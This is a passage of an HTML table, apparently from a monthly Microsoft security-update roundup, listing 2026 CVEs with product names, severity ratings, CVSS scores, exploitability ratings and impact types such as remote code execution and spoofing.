  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44801"><span>CVE-2026-44801</span></a></td>
  <td width="256" class="xl68">Remote Desktop Client
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">7.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42985"><span>CVE-2026-42985</span></a></td>
  <td width="256" class="xl68">Remote Desktop Client
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">8.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">1</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45648"><span>CVE-2026-45648</span></a></td>
  <td width="256" class="xl68">Windows Active
  Directory Domain Services Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">8.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42987"><span>CVE-2026-42987</span></a></td>
  <td width="256" class="xl68">Windows Deployment
  Services (WDS) Remote Code Execution</td>
  <td class="xl72">Critical</td>
  <td class="xl70">8.1</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33828"><span>CVE-2026-33828</span></a></td>
  <td width="256" class="xl68">Windows Device Health
  Attestation (DHA) Elevation of Privilege Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44803"><span>CVE-2026-44803</span></a></td>
  <td width="256" class="xl68">Windows Graphics
  Component Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">1</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44812"><span>CVE-2026-44812</span></a></td>
  <td width="256" class="xl68">Windows Graphics
  Component Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">1</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45607"><span>CVE-2026-45607</span></a></td>
  <td width="256" class="xl68">Windows Hyper-V Remote
  Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">8.4</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45641"><span>CVE-2026-45641</span></a></td>
  <td width="256" class="xl68">Windows Hyper-V Remote
  Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">8.4</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47652"><span>CVE-2026-47652</span></a></td>
  <td width="256" class="xl68">Windows Hyper-V Remote
  Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">8.2</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47288"><span>CVE-2026-47288</span></a></td>
  <td width="256" class="xl68">Windows Kerberos Key
  Distribution Center (KDC) Remote Code Execution</td>
  <td class="xl72">Critical</td>
  <td class="xl70">7.1</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45657"><span>CVE-2026-45657</span></a></td>
  <td width="256" class="xl68">Windows Kernel Remote
  Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">9.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-48574"><span>CVE-2026-48574</span></a></td>
  <td width="256" class="xl68">Windows Media Remote
  Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45490"><span>CVE-2026-45490</span></a></td>
  <td width="256" class="xl68">.NET SDK Elevation of
  Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45491"><span>CVE-2026-45491</span></a></td>
  <td width="256" class="xl68">.NET Tampering
  Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">6.2</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">Tampering</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45591"><span>CVE-2026-45591</span></a></td>
  <td width="256" class="xl68">ASP.NET Core Denial of
  Service Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">DoS</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47643"><span>CVE-2026-47643</span></a></td>
  <td width="256" class="xl68">Azure Stack Edge
  Remote Code Execution Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">9.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-41098"><span>CVE-2026-41098</span></a></td>
  <td width="256" class="xl68">Azure Stack Edge
  Spoofing Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">8.4</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Spoofing</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45642"><span>CVE-2026-45642</span></a></td>
  <td width="256" class="xl68">Microsoft Azure
  Attestation service and Device Health Attestation Service Spoofing
  Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">3.9</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45650"><span>CVE-2026-45650</span></a></td>
  <td width="256" class="xl68">Microsoft Bing Search
  Spoofing Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">4.3</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45637"><span>CVE-2026-45637</span></a></td>
  <td width="256" class="xl68">Microsoft DWM Core
  Library Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45647"><span>CVE-2026-45647</span></a></td>
  <td width="256" class="xl68">Microsoft Defender for
  Endpoint for Mac Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-40371"><span>CVE-2026-40371</span></a></td>
  <td width="256" class="xl68">Microsoft Dynamics 365
  (on-premises) Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">8.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44822"><span>CVE-2026-44822</span></a></td>
  <td width="256" class="xl68">Microsoft Excel
  Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">8.2</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45455"><span>CVE-2026-45455</span></a></td>
  <td width="256" class="xl68">Microsoft Excel
  Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">3.3</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45469"><span>CVE-2026-45469</span></a></td>
  <td width="256" class="xl68">Microsoft Excel Remote
  Code Execution Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44817"><span>CVE-2026-44817</span></a></td>
  <td width="256" class="xl68">Microsoft Excel Remote
  Code Execution Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44818"><span>CVE-2026-44818</span></a></td>
  <td width="256" class="xl68">Microsoft Excel Remote
  Code Execution Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44820"><span>CVE-2026-44820</span></a></td>
  <td width="256" class="xl68">Microsoft Excel Remote
  Code Execution Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44823"><span>CVE-2026-44823</span></a></td>
  <td width="256" class="xl68">Microsoft Excel Remote
  Code Execution Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45459"><span>CVE-2026-45459</span></a></td>
  <td width="256" class="xl68">Microsoft Excel
  Security Feature Bypass Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">3.3</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">SFB</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45504"><span>CVE-2026-45504</span></a></td>
  <td width="256" class="xl68">Microsoft Exchange
  Server Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">8.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45502"><span>CVE-2026-45502</span></a></td>
  <td width="256" class="xl68">Microsoft Exchange
  Server Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45503"><span>CVE-2026-45503</span></a></td>
  <td width="256" class="xl68">Microsoft Exchange
  Server Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">8.1</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45583"><span>CVE-2026-45583</span></a></td>
  <td width="256" class="xl68">Microsoft Exchange
  Server Remote Code Execution Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45500"><span>CVE-2026-45500</span></a></td>
  <td width="256" class="xl68">Microsoft Exchange
  Server Spoofing Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">6.1</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45501"><span>CVE-2026-45501</span></a></td>
  <td width="256" class="xl68">Microsoft Exchange
  Server Spoofing Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">6.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47631"><span>CVE-2026-47631</span></a></td>
  <td width="256" class="xl68">Microsoft Exchange
  Server Spoofing Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">8.1</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Spoofing</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42986"><span>CVE-2026-42986</span></a></td>
  <td width="256" class="xl68">Microsoft Graphics
  Component Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">1</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-41092"><span>CVE-2026-41092</span></a></td>
  <td width="256" class="xl68">Microsoft Kinect
  Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45644"><span>CVE-2026-45644</span></a></td>
  <td width="256" class="xl68">Microsoft Live Share
  Canvas SDK Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47293"><span>CVE-2026-47293</span></a></td>
  <td width="256" class="xl68">Microsoft Office
  Click-To-Run Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45485"><span>CVE-2026-45485</span></a></td>
  <td width="256" class="xl68">Microsoft Office
  Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">3.3</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44821"><span>CVE-2026-44821</span></a></td>
  <td width="256" class="xl68">Microsoft Office
  Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45483"><span>CVE-2026-45483</span></a></td>
  <td width="256" class="xl68">Microsoft Office
  Project Server Spoofing Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">4.6</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45475"><span>CVE-2026-45475</span></a></td>
  <td width="256" class="xl68">Microsoft Office
  Remote Code Execution Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44819"><span>CVE-2026-44819</span></a></td>
  <td width="256" class="xl68">Microsoft Office
  Remote Code Execution Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44824"><span>CVE-2026-44824</span></a></td>
  <td width="256" class="xl68">Microsoft Office
  Remote Code Execution Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45645"><span>CVE-2026-45645</span></a></td>
  <td width="256" class="xl68">Microsoft Office
  Remote Code Execution Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-49161"><span>CVE-2026-49161</span></a></td>
  <td width="256" class="xl68">Microsoft PC Manager
  Security Feature Bypass Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">SFB</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42902"><span>CVE-2026-42902</span></a></td>
  <td width="256" class="xl68">Microsoft PowerToys
  Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45484"><span>CVE-2026-45484</span></a></td>
  <td width="256" class="xl68">Microsoft SharePoint
  Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">8.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45454"><span>CVE-2026-45454</span></a></td>
  <td width="256" class="xl68">Microsoft SharePoint
  Remote Code Execution Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">6.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47298"><span>CVE-2026-47298</span></a></td>
  <td width="256" class="xl68">Microsoft SharePoint
  Server Remote Code Execution Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45467"><span>CVE-2026-45467</span></a></td>
  <td width="256" class="xl68">Microsoft SharePoint
  Server Spoofing Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">4.6</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45468"><span>CVE-2026-45468</span></a></td>
  <td width="256" class="xl68">Microsoft SharePoint
  Server Spoofing Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">4.6</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45479"><span>CVE-2026-45479</span></a></td>
  <td width="256" class="xl68">Microsoft SharePoint
  Server Spoofing Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">4.6</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45453"><span>CVE-2026-45453</span></a></td>
  <td width="256" class="xl68">Microsoft SharePoint
  Server Spoofing Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.4</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47636"><span>CVE-2026-47636</span></a></td>
  <td width="256" class="xl68">Microsoft SharePoint
  Server Spoofing Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.4</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47637"><span>CVE-2026-47637</span></a></td>
  <td width="256" class="xl68">Microsoft SharePoint
  Server Spoofing Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">4.6</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47638"><span>CVE-2026-47638</span></a></td>
  <td width="256" class="xl68">Microsoft SharePoint
  Server Spoofing Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">4.6</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47639"><span>CVE-2026-47639</span></a></td>
  <td width="256" class="xl68">Microsoft SharePoint
  Server Spoofing Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.4</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47641"><span>CVE-2026-47641</span></a></td>
  <td width="256" class="xl68">Microsoft SharePoint
  Server Spoofing Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">4.6</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33113"><span>CVE-2026-33113</span></a></td>
  <td width="256" class="xl68">Microsoft SharePoint
  Server Spoofing Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.4</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45462"><span>CVE-2026-45462</span></a></td>
  <td width="256" class="xl68">Microsoft SharePoint
  Server Spoofing Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">4.6</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45464"><span>CVE-2026-45464</span></a></td>
  <td width="256" class="xl68">Microsoft SharePoint
  Server Spoofing Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.4</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45465"><span>CVE-2026-45465</span></a></td>
  <td width="256" class="xl68">Microsoft SharePoint
  Server Spoofing Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.4</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47634"><span>CVE-2026-47634</span></a></td>
  <td width="256" class="xl68">Microsoft SharePoint
  Server Spoofing Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.3</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">1</td>
  <td class="xl70">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47640"><span>CVE-2026-47640</span></a></td>
  <td width="256" class="xl68">Microsoft SharePoint
  Server Spoofing Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">4.6</td>
  <td class="xl70">No</td>
